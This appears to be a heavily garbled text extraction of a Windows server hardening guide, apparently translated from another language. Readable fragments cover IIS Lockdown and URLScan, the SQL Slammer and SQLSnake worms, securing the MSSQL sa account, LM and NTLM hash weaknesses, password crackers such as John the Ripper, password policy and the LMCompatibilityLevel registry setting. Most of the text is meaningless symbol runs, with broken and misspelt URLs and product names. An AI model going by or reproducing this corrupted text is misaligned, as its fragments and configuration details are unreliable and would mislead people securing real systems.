7C $ Lockdown IIS ?@#A$
bP
? @
) ("c
6
("c ) - P
3
6 :!
IIS
IIS
&)
IIS SL
K
h @" ?
0 5
F
25
I
*
0
-
&
<
') #
Lockdown
-,
. com/technet/security/tools/locktool.asphttp://www.microsoft
'
3 I
SL
"
7
:
Expert
u?
"7
u?# S
) Custom 1/
l'
F
IIS SL
2, 0 5 d *
^P
6 'IIS
a
?@
F)
5< I
N ] WebDAV ? 5 TG' g •
b. #
_,<
Printer, ism. a I ]
) X
g
< "
$O)
.
6ISAPI extensions ? 5 TG' g •
_Idq, htr
IIS - 56 -,< K
b
C 5!
T) ,
5
7
-
3 ) Code Blue
HTTP
0, <
6, "
?
URLScan
? @ A"
4 " % PH K6
) cmd.exe
7< D 7# !
I IIS
R4 S @ ^
6
3
I]
1
) K LLS Lockdown.
.
6 :!
bP 785/ "
7 L
*
2 ` A R4 (,! ;!
&) - 5 l '
"
,G
6, " Code Red
85/] , 5
5
- Y
, #4
0, < -, 6 U )
http://www.microsoft ah @ "
0
- Y ?5F
7C $ URLSean
B'0_Buffer Ovrflow \ "
3
+ •
Z&F " O) -, 6 U )
0_tftp.
2HTTP 0 1
5 MR/ •
6
N
b
?@ ?
' & com/technet/security/tools/locktool.asp
R4 S @ : 2 )
Microsoft SQL Server (MSSQL)
_MSSQL] ' ) #
, F R 4 S @ : 2,
- 9 *5 )
!89
3
0, 5
7
.
6 ' ? 5F
2#5 & -, 6 U )
3 M, 6
F
/ 7 !89
i.
R4 S @ ^
-, < =
'
?#
SQL ? , 6 U )
b
? &
MSSQL
( 5! W 3 F
- Y
u $h
SQL -, 6 U )
,
7 / 23 ,
# 4 (, ! % 1
, )W 3
0,
HS @), , e
6=GX "
!
?@)-
G
?5F
SQL- Slammer/ Spida Hell/ Sapphire ) SQLSnake/ Spida (
) 0, 5
) - Y MSSQL -, < 3 < =GX ^
3 ?1
( E l ' R4 S @ :
2'
,
F
F E F)
Tu<] ,
6(
:
-
" _pqqs ) pqqp T ]
-
785/ 6
1
@A
I
0_T
"
-,< TG'] SQLSnade/ Spida (
b. ,
6h @ ) +
:
,
- 1
@ ? & 0, 6
#P
< ' $ R4 S @
'
a 5 - Y
aMay 2002]
l ' 6(
j &' Kc ,/
B5# 7 !89
? " 7,
6
4"
" ?
K
c
$l '
B5# 7 !89
•
http: //isc. Incidents. Org/ ang lysis. Html? Id= 157
•
http: //www.eeye. com/ html/ Research/ Advisories/
AL20020522. Html.
•
http: //www.cert. org/ incident- notes/IN-2002-04. Html.
T G'] SQL-Slammer/SQL-Hell/Sapphire (
:
B5# 7 !89
aJanuary 2003 v
•
http: //isc. Incidents. Org/ analysis. Html? =157
•
http: //www.nextgenss. com/ advisories/ mssql-udp. Txt
•
http:
//www.eeye.
AL20030125. Html
com/
html/
Research/flash/
-,<
•
http: //www.cert. org/advisories/ CA-2003-04. Html
) wxss
4 Internet Storm Center b
67
K67 4 B
5F " _MSSQL -, 6 U )
,<
0
, #4
" ? 59 T L/
0,
2
0
I5
F
DY/
,
( , H ? @ ? 5 T G' g
sa Account
" ?
6
"
) h, /
-
P
6) ( E
:
" %#
T
0, 5
"
#
6
2<
)
U)
) 6
$l '(
%
N 4$
gatway
\ ' A) 2
#
N
7
UDP
^
0_-,< - < 7 4
'
L
/] , < %#
H
wxsx 7
bP
#4
4y
!89
F
3
H, , e G
)
I
Z F MSDE ? @
)
\X
!89
? ,6
Patching
6j 4 7 L
z) 3 ) ) ) -" F]
_ SQL -, 6 U )
6
F SQL
bP
MSDE 2000, Microsoft Server 2000 Deskrop Engine
,G 0 '
!89
1
@),, e G
("c 7 ,H 5
B')
6
#B
5!
5
l ' GH ) h
0 ' ,6 3
,
-, < K 7 ,
3& @,,
0
[
I5
) -,< N
wxsx 7 4
5 0, 5
'
Resolution Service
Overflow Stack Buffer \ 2
), <
?
SQL Slammer (
2
6
&
3 account
?@ "
h
"?&
R4 S @ ,L
K6U )
I
SF l 'Buffer Overflow 0
( ,H (
" :
Sa Account 0 5
P
!&
Buffer Overflow
_% 5/] A
bP
B5# 7 !89
- . _0 < 5 - Y SQL/MSDE Z F
SQL Server
..
0 < 5 - Y
I
-, ` 4
P
!&
account
^
K7 L
#B
5! - .
Null
_,<
- Y Chang the SQL Sevr Admininistror Login h @
?@ d *
b
SQLSnake (
N
, )
67 4] wxsx
25F
, account
("c :
" #
e 'j 4
H _ '#< - N]
sa account] e 'j 4
0
-, < K A & h
#P
< 6
#B
5!
"] SQL Lite Server ? G ?
2
P
/
?P
/
"
"
-, < S L Server SQL " *
) 6 @, <
)
7c L. - 56
Z&F "
? @)
# ? G MSDE 2000 0, ,
P
a
•
*<
SL
"
SQL/ MSDE Server 2000 (Developer, Sradard and
Enterprise Editions)
•
Visral
Studio.
NET
(Architect,
Developer
and
professional Editions)
•
ASP. NET Web Matrix Tool
•
Office XP
•
Access 2002
•
Visral Fox Pro 7.0/8.0
0, 5
,
-Y
, 6 3 SQL/MSDE -, 6 U )
#40
= B*
6A) " - Y
8Q 0 < C
A
" - Y
$? ,
H? ,
_TCP 7
0_
F) & -, < - <
wxsx 7
wxss 7
4
/ 9 -,
-
0,
TL
4
$pqqq MSDE
F
UDP
&1 # ?),
#
Overflow Buffer
^
4
U)
60
? ,
d*
")
GX) $, < , 6 3 ( E UDP h
6
;! $,<
)-
%L
?@
UDP
U)
^
0
$-, 6 U )
-, <
? ,
X02
0,
<
"
* A) " I '
,6 3A
wxsx 7 4 )
!89
K6
$
( 4
#4
NAMED PIPES
)
l '7 4 0
3
l ' ,
6" - Y ? # ] ,
? !
l '7
6
L ?
? ,
#) )
TL - . T
!89 $
( E
4" - Y
pqqqMSDE
!89
56MSDE ) SQL -, 6 U )
y 6567
#
b
& ?@
N?
4] Session NetBIOS
4 xxr|ws{ 7
^
,K
U)
#
R4 S @ ^
( E
U)
TCP
U)
6? G MSDE " l ' 6 &'(
!89
!89
3
:
F) -, 6 U )
\ 2 " 785/ 6, "
#
?@
F
pqqqMSDE
'
6-"
Z F System Local
,L
account
^
,
4 # " I ' ] 0,< ,6 3
) User Domain
$ F
6- Y/ " & @
0,6
,L
Overflow Buffer
)
- Y ,L
, , j6
F
("c 5 $
nH
Critical Update a I ! '
R4 S @
7 K
&F &1 @ ) K <@
' - Y _,
H , , ) - 9* e G
6& " - Y ) '
0 5 ( N6
[
0 5 - Y Incidents.org h @ " ?
- Y $, 5
? @-
6% '7
"), )
Microfoft SQL /MSDE Desktop Engine
"
,F 7
0,< ,6 3
N
:
)
8 (
6& "
h @n
^
0 1 !"
6*
"
6
6) , < -, < SL 2000
&'(
HS @),, 2 e G
2
l'
) pqqq SQL/MSDE Server7.0
!"
K
K
Kit Microsoft SQL
$ SQL/MSDE
56
- Y
- Y $, 5
0, 5
2 +. /
SQL/MSDE Server,
F
, # 4 ) Patching " 5
% < 6 #P
< ) Domain ( 5 ?
6
^
" SQL Slammer #
, # 4 ) Patching " 5
nH
3) l ' F
$, 5
- Y MSDE 2000
0 &'( )3 45 678
! 5E
') #
<
9" ?
http://www.microsoft.com/sql/downloads/securitytools.asp
? @
SQL Critical Update Kit $-,< K Toolkit 0 5 , 4
6 & % < ) -,< -,
& SqlSecurity.com
0
SQL Critical Update ) SQL Scan
!89
-
K
5
$, 6
$l ' & 0
)? &
A
^
UDP1434 7 4
wxsx 7
SQL Pingv2.2 (
4
_X02
SQL ? , 6 U )
& :
2
UDP
, ]
0, 5
I
T
Subnet
) *
- 5< I
SQL Scan Microsoft
0
^P
!89 ) -
l ' &'(
#B
5! 0, 5
2 &'( )$,%
TP
"7 B
5! $l ' R4 S @ : %
("c v 4 ?@
(8!
%
6
9
9:; 678
DY/ I
a K5
KHIJI UDP G 7E
' SQL/MSDE Monitor Service D 7E
# E
/ EF •
-, < K
6
S @ : )
BH " - Y ) SL
MSDE 2000
?), ) ) - " ) - Y
UDP n 9 " F
User
& @
b
) %L
6
O*
'L 7
T
( ,H $
)-
#P<
#P< )
6-"
1
@ " U4 F
SB #P
< )
^
account
2#5
F
&1
e G
O*
'L 7
R4
N`6
0 <; !
) Domain
6- Y/ "
0,6
UDP 1434 7 4
,L
0, 5
6
0, 5
T
s}~
IP
!89
6h @ 0
? 5 TG' g ] Dos \ " F
_U )
7 B
5!
MSDE SQL/MSDE 6 1 M
SQL/MSDE -, 6 U )
F
4 # " I'
' $l '(
' " MB/Sec - E 4 " j - 1
@ 2<
0
,K
3 I
F
I
Ms-SQL/MSDE Slammer (
!89
Multicast \ " $,
n . $W ,
$
,L
s}~ % <
, 6 3 j &'
-, 6 U )
FSystem Local
' - Y $,
3(E
Buffer Overflow
,
MSDE2000
H , , ) - 9* e G
$
$l '
0 5 SQL Pack 3a Server 2000 - 56
F
'
n 9"
( ,H ?
( E ?# C
85! ) W L 3
0
:
$-,< P
[ 7< & h
0,< ,6 3
3
#P
<
Pack Service * <)0 L @ •
Pack Service
6*
2 3@ K2000
a" ,
SQL/MSDE Server 7.0 Service Pack 4
Pack 3a MSDE/SQL Server 2000 Service
P
!
K Pack Service * E
<) M E
'6E
= $> Patch * <)0 L @
U)
6*
b
5
-, < K
6Patch 2 3@ "
-,< K
- Y
"
6h @ " ?
I
SQL/MSDE/MSDE -, 6
21 " ?
F Patch 2 3@ SL " ? 59
a
6@
I
0 5 - Y
') #
SQL/MSDE -, 6 U )
:
SQL/MSDE Server 7.0 Microsoft
SQL Server 2000 Microsoft
Server Desktop Engine 2000(MSDE 2000) MSDE
Patch * <) M '$A0 $ L N O < 0 1Patch 0 L @ •
$> $P7
Tasks Elevation of Privilege in SQL/MSDE Server
'G " U 4 K E 6E
=
Patch ?
$ Web MS02-061
I
0
-,
a 5 - Y
K
"
"2
9
-,< K Patch 2 3@ "
6h @ " ?
6 @ ) ? 59
SQL/MSDE Server 7.0 Microsoft
SQL Server 2000 Microsoft
Server Desktop Engine 2000(MSDE 2000) MSDE
I
KPack Service * E
<) M E
'6E
= $E
> Patch * E
<)0 L E
@ •
-, 6 U )
6*
- Y
b
' ) #
-, 6 U )
5
-, < K
-, < K
6Patch 2 3@ "
21 " ?
SQL/MSDE/MSDE
F Patch 2 3@ S L " ? 59
:
a
- Y
"
6 @
I
0
5
SQL/MSDE
6h @ " ?
SQL/MSDE Server 7.0 Microsoft
SQL Server 2000 Microsoft
Server Desktop Engine 2000 (MSDE 2000) MSDE
Patch * <) M '$A0 $ L N O < 0 1Patch 0 L @ •
$E
> Q7
Tasks Elevation of Privilege in SQL/MSDE Server
'G " U 4 K E 6E
=
Patch ?
$ Web MS02-061
I
0
-,
K
"2
9
I
0
-,
a 5 - Y
K
"
Patch 2 3@ "
6 @ ) ? 59
-,< K Patch 2 3@ "
6 @ ) ? 59
"2
9
6h @ " ?
SQL/MSDE Server 7.0 Microsoft
SQL Server 2000 Microsoft
Server Desktop Engine 2000( MSDE 2000) MSDE
C 5! l '? # KAuthentication Logging SQL Server D 7E
# E
/•
Enterprise Manager
n 9" ?
?@ ? 5 TG' I
0
TG' g
_Server Properties Security ]
785/ 2 1
),
_sa” (
"
# K$@RE
=
!E
"
sa Account #
0
, F, , e G
j *
$, <
-, < K 7
sa Account
P
!& ?
" - Y
E0
3
_blank]
$ MSSQL/MSDE
SQL/MSDE
-,< DY/ P
!&
("c 0
< , 63
H
Administrator (SA) Login System
2t
5: W L3
("c ? 59
- Y SQL/MSDE
SQL/MSDE -, 6 U )
0_
*# •
P
!&
2
^
- Y l 'account " 9
K 7,
5
4"
Server Book Online
6E1 M
, account "
-, < 3 <] e 'j 4
^
S,E
5 ( ,H
R4 7 ) X ("c
/] 0
7 ,H
the SQL Server Administrator Login j *
) ' ) #
%
& $, 5
MSDN
/
5
-, <
and Change the System Administrator Password by Using ) $ Changing
) , #4
I
-,< K
6
) 7 # 2 3@ " ?
MSDE Verify
0 5 - Y $sa Account S
M
MSSQL/MSDE M
E
U)
4 :
Domain
?
2
!
]
Z F^
B
. 7"
) _NT "), )
6 56
E
; $E
E•
KSQL/MSDE Server Agent 6E1
. $ SQL/MSDE Server Agent ) -, 6 U )
] Local System
)
E $E
EQ7E G E! D E
I
7"
] SYSTEM
S @e G
U)
%H , /
MSSQL/MSDE
account Valid
) administrator domain
0 _XP
) pqqq "), )
0
,6 3
#P< )
%
T
?#
F
Z F Domain
$
a
4
"
:
2
auditing ) Windows NT Authentication ? 5 T G'
U)
$-, < F
7
#<
)& @
MSSQL/MSDEServer
0, K5 T G' ? @ C, E ) = H
"
, 6( E
N
6Login
'
? ,
U)
,
#4$? #
0, 5 - Y Authentication NT
#P< "
g
6- ),.
F) 3 )
: y
B'0
) ) 7c L W L3
R4 7
W 3
TCP/UDP
;! ,
? , 6U)
^ P
P
6
("c
6U )
4"
F 3
67
4"
N 4
( E
bP ) MSSQL
"E
$ SQL/MSDE -, 6 U )
"
67 4 z) 3 ) ) )
)
B
3 ? 5F
G5
SQL/MSDE
4
("c #
B'
0
B'
G5 )
R4 S @ %
y
y
wxss ) wxsx
$, <
wxsx ) wxss
- Y
^
1
@)j
0
^
!89
$
(E
25 "
- Y
TCP/UDP
l ' 67 4 "
6 @
a 5 - Y
I
"
-
Microsoft SQL/ MSDE Server 7.0 Security
-
Microsoft SQL/ MSDE Server 2000 Seurity
6h @ " ?
&'( )$,% * 7
Windows Authentiction
% G
6
6A)
?
6, )
Q0
b
f
-, < -
) 6 '-,< d *
+
" - Y
+
" - Y
DZ
0
N` 6?),
)
" U 4 ? 5F
)
" )-
6%
6account
#
- 5 account
, N ) = G0 <
( #.
" I'
H
?@ =GX
P
!&
u
-)8!
/)
+
,6 3
F)
2
3- Y
R
0,< ? "
H
% !
3\P ? "
+
P!
F) ,
B
5! $
) X
a
P
!&
< ,K
,
75I
€
P
! & ,H ' ) = GX
F
6 1G'( E
6, 4 ,
4"
2 1
), ) 2 5
,6 3
<
6(& # " - Y ] -,< , K ?
+ $
0
-
6
\ ' i: 2 1
) E
-,< 2),
S @^
,K
•c $
P
! & ,H ' ) = GX account
-, < K
:
) -,
,6 3
=
9P
? @"
0
H , F7 , , e G
< TP,
,F , , ,
b
SB
'
!89
F ) -, < = G
U 4 0, <
F
) , K " U4 ? @] 0,<
_0
2
, K " U4 0 < ,6 3 N
1G' #
,
" - Y
)?
6" E ) 7 "
S[ ?@
0, 6
6
1G'$
, -,<
H _7) Y
&
P
P! &
) % ' DY/ I ?
?# ?
P! & 2
P
! & 2'
-
"E
5 $
/
C
5
?@
?@?
6A) $
!89
6&
H -, < -
?@
)
) T) ,
P
!
+
, K
"
P
!&
6& " ?
P
!&
? "
9
P
!
% <&
^P
R4
-,< = G Account •
S
DY/ (, ! •
0-,< = G
, account E ?# $ F
= GX
6 &'(
0, 5
4
5! , B
hashing 5
N1
"
-, < &
) ) ,
\ 2 P
-
F) 2
, 5 ,H
6& " - Y
0
2
), 5
0, 5
P
!& ?
5 T
0 <
X
,K
+
"
S
) ( #.
3 1
)
GP
2
W L3
6& "), )
_hashing
6 *1 E/
F) , K
_
"
Hash ,
[ 19
a
"
N1\
)
6
F
Hash ,
D
"
("c
("c
P
!
I5 $ P
!&
DY/
= G
7 L
,
- 3•
P! &
message digest] -
,
<R
?#
# b
E _ <
$hash ,
-,< 3 < 0_
P! &
d
•
6
E 0
?@ -,6
) - 3•M Y<
- Y ?
N1]
b
)d*
7
)
P
! & ,H ')
)-
/
SB
g
0 < ,6 3
?@
h
83 ( 'hash ,
, Hashe ,
6'
P
! & Hashing
N& ]
3
) -, <
N $-, @
%5G1
P
•
)% !
5
"), )
5 ] LM •
NTLM •
_ 5
LM] Lan Manager] "
LM
-, < Hash
^
XP, 2000 , "), )
LM #
F
0, 5
"
" 7,
5
#< $ F
$, <
P
!
6&
- 3•_
B
. 7
P
LM
,
( #.
6 &' * 7 , H
-,
%#< 2 ,
B
G' 6 # )
P
5 ] NTLMv2 •
)
) X "), ) B
G' 6b. Q #
e 'j 4 7 L _ <
NTLM, ] ' ) #
#< -
5/
"
,
] NT
GX) pqqs "), )
N& T,
"
- Y _NTLMv2
6& $, 5
) 7 ,H
1
),
& LANMAN Hashes]
= GX S 5
P
!
Z#
L "), )
P
!
6&
/,
) W 3 K6A) " - Y
Y6
0,< , 6 3
HttpL://www.msdn.miscrosoft.com/library/default.asp?utl=/library/e
n-us/security/securiy/h-gly.asp
" % c, LM hashes =GX
a
0, <
0, <
% ,P
-
$ 13
0,
d *
&E
7 B
5!
Y6
H F
P
Qf
)
, 5 ! 5E )
2, )
Hashe d *
d *
& _dictionary- style]
P @ hashing LM A ) 2
6 <
0
Lan , K , @ 'SAM
Lmhashes "
)? ,
?@ )
K62<
A) %
HS
%H , / 0, <
P
!&
-
"), )
2
)d *
?
H F
6& •
Ih /
0,
2
F
6
F
- 3• :3 ) , ,
,F
-)8! 0
,6 3
e 'j 4 7 L ) SB
g Manager
#
("c 0
N1" - Y
6-
H$
' R4
-, < S L
I 5 hashes LM = GX
T
, K, @ ' ?
) 6 '_
,
' )n.
R4 S @ LM hashes A) " - Y
5! ?
P
!
K6 <
\X
- < # 2
6
F
K6 < 2
5
)
,K
5
P
!
, ` 4 0,< ,6 3 6 '
P
!&
U)
5 hash
6& •
P
!& d *
, 6 3 -, < 2 5 > ?@
)- 5
b
P
!
-
H, , e G
-, 6 U )
7 B
5!
$, <
#
6& •
0, -, < % , P • & M) /
Y6% < C
'
)-
P
!
-,< , K
/ S 5 ,<
#< C
/8:
6& •
_cracking]
),.
R 3 ) l '7 B
5! % 5#
S
P
!
hashing , @ ' 6
F
6
?# S
j &'Hash T 9
P
Y6j* )
C
'
+
>'" - Y
% ,P• & M) / C 5
0,
&
),.
!89
5
2
<] +5 l
0
,6 3
Y , 4
CG:H )
?# C
85!
P!
6& ? )@
GX)
,
2 +. /
0,
H,, 2 e G
!"
0
H F
U)
)- 5 V
&
( #.
- Y
"
6@
6
5
,
- <
%B
!)%c
"
#
%
/
0 5 - Y
1
) $, -,
?@
# 2
" E
'
B
.
"
)
0 ' ,6 3
#P<
!89
2
C,E
,6 3 S @ e G
$,<
- 3• B
. )
•
Bc, #
<
F) -, 6 U )
( ,H 62 < " \ 2
2 &'( ) %
5
) , 5 ,H
"
:
2
P! &
0, <
P
!
6& %
E
I 5 ("c
#B
5! .
- Y
•
0
" - Y = GX
0
2000. NT "), ) #
4 ) - 5 LM hashes T
<%
K6
H F
P, K , "
HS @e G
6" E
"2
0
LM
-,<
P
! & -, 6
- 3• # ) " I '
e 'j 4 7 L Lan Manager hahes
I5 ? "
b
,< ? , " ("c
a
, -,< SL e 'j 4 7 L XP,
K6
P
!
?5F
t6
F) C
8Q
)
("c
5 $
LAN Manager hash
^P
#
ZF
5
John the Ripper ) _LC44 ] 10phtcrack version " ?
"
5
TG' 6Account
6 &'(
?@
6*
0 &'( )3 45 678
:
I 5 6A) 2 P
"
R 3 ?), 0,
"), )
3? "
6& cracking
P
!
d *
P
! & =GX
0 1 !"
,6 3 E
9:; 678
\ '2 P
)2
6%5G1
%5
) ( #.
" ? 59
#.
I5 ? @
a
2 7R 0 1T UV"
U@8!
4
D #P •
P! &
6?
' T /2 !
' ? "W L3 )S
)-
6A) " - Y
P
! & -, 6 d *
A)
#
F
6
SB
g 0
0, 5
], <
2
" \ 2
0, <
_?@ =B*
:
%5
P
!
Y
_password] , 5
P
!
6&
O*
#
M /2 1
) 2' ]
)
,
"
<P?@
,1
P
"
P
!
M) / % , P ( ,H
?@ _
("c
2
? !7 P
!
'L
#) h
c 9 <
)@ ]
-,< F
"
&N F 5B 6
E
H?
_
7
-
-J)
("c 0 <
(E
" ) -,< -
1
) K5 - 3•
I ?
K6
5 $O 3 &
# 2
? "
2 ), " U4 _
, P4
H&
password
d *
6&
- <&
2 ?
)
P 785/ ?, < F
H I
T
\X
W 3
- 3•" M,6] ,<P %#
I 5 ("c %5G1
$-, < = G
( O
%5
P
!&
"
P
("c A" @ ?
3
#
/
) KP
Y1M) / "
!
-
5 MR / 5B
? @d *
6&
"
O* ,
M) /
P
!
%
) 5B
) " )@
M) / ) KP
Y1M) / "
*
6
"
, 6 3 785/
3?
5F
E ) O * W L3
B' (
-,< & %#<
" ,G0
)-
<
6
?@
-J ) M) / ) , !
-,< 3 < (
0 <-
N&
" - Y ) ,G
I5 ) - 5
0,< ,6 3 crack
0, < -,< h PH
),/
P
!&
"
-J )
= G
password ) - P
A)
"
<) "
,< -,< 3 < 5B
3
&
7 B
5! $& @
P 785/ P
6%#< %
-,< Y ? @
0, 5 = G
N F2
P
<" @ 6? "
6&
password (
C
'
P
!& d *
N F- 5 S
("c
0 5 crack
2
-, < 3 <
• ,G
= G - . W L3
Q
#
# 7 5B -, < &
P! &
?
(E
- Y
Hl ' 6
&' * " - Y
T#<
A" @ ) S
9*
&
" ) - 3•
P
!
6&
(8!
6%5G1
T 5! " U 4
" ?
P!
, 5 ,H
6&
Local
.
I5
2
PF 62 ) "
& 2
pqqs $XP $pqqq"), ) 0
6&
I 5 "), )
) 4 " ? 59
6*
)- Y
Q
"
0, <
$
?
b
6
" ?
&
:
- Y -,<
?
7
u
j &'
-,< = G
I5
-,6
a 5 TG' Securty Policy
Local Security Policy Program
Start Pr ograms Ad min istrativeTools Local Security Policy
Select: Account Policies, Then password Policy
a
? 5 TG' Password must meet complexity requirements
$l '
? "
, ` 4 ) ( #.
m .1
-, < = G
I5
P!
F
6 ,
!
6& $ 1/ 2
account ( "
0,<
*
0,<
a,<
" ! 5E
" -)
(&B
0, <
a,
% 5 ?
?@ " ) = G
" U4 )
3 B
P
H
"
P
!
(, ! W L3
? 5
P
!&
K6
% <
P
!&
_Z
A]
B
N
P
Y1• & M) / •
_z
a]
B
N
PY1
q
M) / •
6 H ] 6,6
_ %,µ, s/ ,! C
8Q] KP
Y1 g
,
"
5 $ P
!&
j< %H ,/
"
P! &
u ) E
E
)(5 % <
_{
U4
•
Policy Local Security
" 75 I
4(H
•
•
6
SB
g apassword history (range: 0-24 Enforce)
B
P
H P! & ?56C,E $ 3
5 d*
6& " - Y
?
"E ?
("c ? 59 #P< ? , $S
P
!& " - Y v
$l '
Z>
"
" - Y
0, 5 - Y
$, ,F -,< = G
P
! & 2,
2 , 0, <
, ,F
GX)
\X
,N
2 ) - )@
I
0,<
,
?
b
< TP,
, # 4 " U4 B '8
P
!
#P
<
6&
P! &
$ Y
5 $ P
!&
`*
d*
,
$") S /
0_, 5
$") S /
, 2'
P
!&
P
!&
I
_
u
_ P! ] 5! Q , /
P
!&
3
P
!&
u
H
B 'c
,< ,6 3
minimum password age , # 4 0,< maximum "
N
m.1& password history
u
5 ,H
) M , 6 -,
P
!&
P!
#
P
!&
0
? ,
(&B
LOG on 7 B
5! $?
:
F) ?), 0, < -, <
P
!
5
" - ), .
" U4 ) = G
_, 5
#
&1$,<
minimum
" 0, 5 #P<
F) ?
, ,F
F) ?
, ,F P
!
e 'j 4
$Characters Minimum password length 0-14
T 9 %H ,/ ] , 5
-
, b
, password history
0
_ P! &
3
S
d*
Y
password history % 1 2 , 0 < ,6 *
, G %H , / $l '
,P "
6
O * password History % 1 2, 0 < ,6 *
,
6& -,
("c ) - P ? "
P! & _ u] = G
O*
<( E
6 '? @
? " 7, ?,<
5
,
6& " , E - Y ? # ) -, <
2 ƒ e 'j 4
)(E
Y " j
password age minimum
,
-, < = G
,<
H?
l '? " 7, ] L *
I
_ P! ]
)F
$ Y
I
P
!&
0 Days Minimum password age (range:0-999) ‚, < , 6 3
d*
2'
Minimum password age 0, 6
)
[
(&B
-" F ?
&
)" " ,
u
# " % PH ] , 5
)
YB*
F) minimum password age
<
# " %P
H ] 0, 5
-
P
- Y
Maximum password age (range:0-999 days)
5! Q , / $l '
$l '
5K ) 5
GX)
u ?#
0,<
5!
P
!&
2
d*
P
!&
P! &
= G
T 9 %H , / :
("c
2
?
T 9 %H , / 0
#
MR /
P
!&
0, < ? "
0 '
I
F) 7 ) X $ Y
6
"
6 , ?
0, -
4 :
2
,
- ")
, W L3
)S
0 '
$ P! &
F) 'Y< ) d *
:
, $ #P< 7 !89
6? "
2
"
3
In the domain Store password using reversible encryption for all
N& " - Y
P! &
"
K6
?
, K , @ '( E
N&
W L3
"
("c
6&
P
!& ]
6
7
$-, < DY/
0
P! &
6 @
I
- 3•0
15G
P!
l'
P
!&
"
- 3•$ ) )
K6%# ) 4
-, < K & $, 5
6&
$, 5
- Y
- Y
?, < T G'2
" - Y
0 users
$l '
2
"
4 ? 5 m .1
d*
5/ 7 # $ :
I
P
!
2 7
, 5
) )
0_
I
- 3•
( &1 I
,G
0
6&
"
6
P )
" %51
E
I
?@ " ?
K6A) "
6account "
F$ 5 - Y ?
R4
#
6 -, `4
a
P
!
b3 n 9
from Command line Promp:
Net User Username/random
6)
56] -, ` 4 ) ' L
I
P
!
P
!&
6&
- Y
6
P
GH ) ?
& cracking
("c _
P
!
P
!
) -, < I5 S
^P
6
6&
F$ P
!
, @ '"
, < ? , " ("c " E S
("c " E S
6& $l '%5G1
P account
_T 9
# $l 'A) 0 <
5 )6&
*]
-
j 5 .Y
Service accounts
Y
&5
- <\ X
6
^P
A) 2
Stand alone
?),
" U 4 0 < - Y cracking
•
F
"
GX)
2
0
P
!
C, E
5 $? "
)
l '7 B
5!
crack ? @
$
?@
P!
) -,
$
6&
0
? @ \8 9
H?@
3
I
N
? "
(, ! 0, <
3 ?#
-, < - 3•?@
SB
g 0 <-
) C 3 0 <I $?
b
DY/
:
? @ DY/ (,! 7
?
K6% '
I
'
DY/ ) ,<
A" @ ?
3
= GX
$ K6( 4 2 `
<
$
) [
>/
?@ "
,
<
)W 3
("c ) P
!
)
6&
-, < % L
, Y 5! ( 5 -,
("c 2
K ("c
6account
F
$, 5
6A" @ ?
(E
MR/
!A •
2
1E
0
6 N4
0
^P
5
6
$
5 - Y
6account &5
)
:
,
P account
)
0
2
F
? , KE
1account #!"
#P< )
0, <
4
'
0
K
B
5F " $,
P
!&
" %P
H)S
E
$6 )
H
6
F) ? N
,<
P
!&
3
("c
P
!"
“ and must be changed Your password has expired
O*
$, <
H,, e G
A" @
P! & 2 < (,! $ N
6&
,K
E
9:; •
0 ' ,6 3
B
.
P
!
v 4
6%5G1
/ K @8!E
" 7E
R 0E
1T
$?
6&
crack
("c
"]
$ P
P!
?@ ?,
6&
& $_ E
6
% <
P!
I
l '7 B
5!
$
O * - . W L3
6&
F
)
\ X
P
!&
P!
F
( E -,< DY/ 2<
( E -,< DY/ 2 <
-,< +H ) F
$
6
0
K6A) " - Y $= GX
, 5 ,H ) #.
%5G1
6&
. 7
$S
0
?
P!
craking
P
!&
B
1
I K6
&
N
:
^P
6account ? )&' I
1 -,< , K
) "
- 4 $,<
W 3 K62 )
5 ?@" - Y
0
?@ ?
(N "
K6account MR/ )
) X
3
"%
, ?@
, P4
'
account MR/ I
%L
0
S
, N)
)% !
b
- Y & $
F
P 4
-,< K
-, < K
3
- Y $, - 5 V
I
:
1
7 # " - Y
2
P$
%
/ ? 59
62 ) "
? "
# 54
? R!5' 0 +W •
K 7R T
6 „ 1 # 2 3@
56
1 P!
0
)?
3 -
-)8! ?
$ P! &
6 & " $ #P
< 6U )
P
!&
, N $S
2, 0
0
lan
&N F
6,
& 2
LM E> D 7E
# / F•
K$@RE
=
_Version2] Ntlmv2 NT LAN Manager A) " - Y Manager
0
$, K
I
,6 3
6(& #
P )
I
#.
N& " - Y
E , B $ " T),F
a,6
?
$, 5
T
- 5 M 9
$NTMV2 v 4 |j1
LM
pqqq ) NT "), )
6=G
l ' BH
Rgistry key
Hive: HKEY_LOCAL_MACHINE
Key: System\CurrentControl Set\Control\LSA
Value: LMCompatibilityLevel
ValidRange: 0-5
Default :0
f4
Y 2
, ,
)d*
, K A) ) \ $l '
Q
4 •
a,<
7 # " & 6$NTLM ) LM A) h
v 4T
0 < 5 - Y NTMv2
NTLMV2
7 # " - Y
NTLM , K A) h
T
…p
NTMV2 , K A) h
T
…s
LM , K
;! DC
…x
) -,< NTLM ) LM , K
;! DC
…r
0
' R4 NTLMv2 , K C
'
…w
0
- Y
?
0 5 lan Manager , K i:
6
pqqq "), )
LAN
^P
0,
#4
75 I
, #4
("c :
$ Manager authentication level security: Network
I
) SP4NT "), ) $ 6
-, < S L ?@ " , G
)
? ,
U)
LM hashes T
"
5
("c 2
5 ,H ? ,
U)
NT Lan
?
E
4 ,
2
6& " - Y 7
?
I K6
$ NTLMv2
,
5 #
‡ NTLM " - Y
:
#
$, <
f4 , Controllers Domain
I
$l 'U )
0_ #P
< )
(&B
P LM
I
BH " - Y
) Y
_ {† "), )
hashing
0 5 T5! Domain Controller
0 '
6
SL " U4 0
0, <
$ 5 NTLMv2 " - Y
u?
)
6 ,
5 - Y Network Client Microsoft - 56
$, 5
?
O* S
l '
N 4] '
LMCompatibility (
,
)
Directory Services Client
?@ )
(5
NTMv2 " {† ) {r "), )
e 'j 4 7
I
2
) $ Manager authentication Level LAN
0,
)
( ,H ? @ "
Security Options ) Policies Local
O* S
pqqs ) XP "), )
) ,
I
) T G'Policy Local Security
&
•
# & XP ) pqqs $pqqq "), )
-,< K
SL
,
,
) {r "), )]
:
I
Manager,version
LMCompatibility Level
authentication level Manager
("c 0 '
U)
Send NTLMv2 Respone only\Refuse LM
I
)
), . T 5! $ :
MR / ^ P
B %K
& 2
? @ "
-
LM hashes E ? 5 TG' g
1
)-
-, < SL ? @ )
(E
2
l '7 B
5! T
$ "
) ,< ,6 *
Value on next
0
? ,
/#
•
LM hashes
& #
') #
C
'
F)
?@ " - Y
XP ) pqqs $ _
-, < E l ', B Windows 2000 Domain Controller )
5 - 3•&
LAN
- < # 2
6
E , B0
I
3•$ #P<
I
) SP2] 2000 "), )
,G
25
# KLmhash 0 E 6 E<X
"
) SAM
0
?#
